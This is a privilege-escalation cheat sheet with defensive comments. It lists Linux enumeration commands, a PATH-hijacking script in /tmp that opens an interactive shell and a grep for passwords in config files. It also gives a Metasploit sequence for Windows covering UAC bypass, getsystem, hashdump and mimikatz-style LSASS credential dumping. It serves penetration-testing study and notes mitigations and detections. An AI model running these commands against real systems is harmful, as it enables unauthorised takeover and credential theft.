
Privilege Escalation

Manual Linux Privilege Escalation

# Manual Linux privilege-escalation checklist. Each line is an independent
# enumeration command (nothing below depends on an earlier line having run),
# so a reviewer can read them one at a time.

# Check current user and groups. Chained with &&, so each later command only
# runs if the previous one succeeded.
whoami && id && groups

# Check sudo permissions: lists the sudoers rules that apply to this user.
# Mitigation: review sudoers for NOPASSWD entries and overly broad commands.
sudo -l

# SUID binaries: -perm -4000 matches files with the setuid bit set, and
# 2>/dev/null hides the permission-denied noise from unreadable directories.
# Defenders keep an approved baseline of setuid files and alert on new ones.
find / -perm -4000 -type f 2>/dev/null

# Check processes
ps aux

# Writable cron jobs: show the system crontab and the per-directory cron
# entries with their permissions. Mitigation: cron scripts must not be
# writable by unprivileged users and should call binaries by absolute path.
cat /etc/crontab
ls -l /etc/cron.*/*

# PATH hijacking: writes a two-line script named cp to /tmp, makes it
# executable and prepends /tmp to PATH so an unqualified `cp` resolves there
# first. The export only affects this shell and its children. Mitigation:
# privileged scripts use absolute paths, and sudo's secure_path ignores the
# caller's PATH.
echo -e '#!/bin/bash\nbash -i' > /tmp/cp
chmod +x /tmp/cp
export PATH=/tmp:$PATH

# Search config files and credentials. The grep is case-insensitive (-i)
# and, unlike the find above, does not silence stderr.
find / -name "*.conf" 2>/dev/null
grep -i "pass" /etc/*.conf

# Kernel exploit (last resort): <version> is a placeholder for the kernel
# release printed by uname -a. Presumably listed last because kernel
# exploits can crash the host; the mitigation is keeping the kernel patched.
uname -a
searchsploit linux kernel <version>

Metasploit Windows Privilege Escalation

# Metasploit post-exploitation flow against an existing Meterpreter session.
# Every <ID> and <PID> below is a placeholder to be replaced with a real value.

# Background the current Meterpreter session (returns to the msf prompt)
background

# Suggest local exploits; the backgrounded session is passed via SESSION
use post/multi/recon/local_exploit_suggester
set SESSION <ID>
run

# UAC bypass (if the user is not fully admin due to UAC).
# Detection note: this module is well known and typically flagged by endpoint
# defences; mitigation is UAC at "Always notify" and not working as a local admin.
use exploit/windows/local/bypassuac
set SESSION <ID>
run

# Attempt privilege escalation (to SYSTEM)
getsystem

# Migrate to a more stable or privileged process. ps here lists processes
# from inside the session. Cross-process migration is a common EDR detection point.
ps
migrate <PID>

# Dump hashes (requires SYSTEM privileges)
hashdump

# Load Mimikatz-like functionality (kiwi) into the session
load kiwi

# Extract plaintext creds, hashes, tokens, etc.
creds_all

# View cleartext credentials from memory (reads LSASS process memory).
# Mitigation: LSA Protection / Credential Guard limit what is recoverable;
# detection: non-system processes opening LSASS are a standard alert.
kiwi_cmd sekurlsa::logonpasswords

# View NTLM hashes (if available)
kiwi_cmd sekurlsa::msv
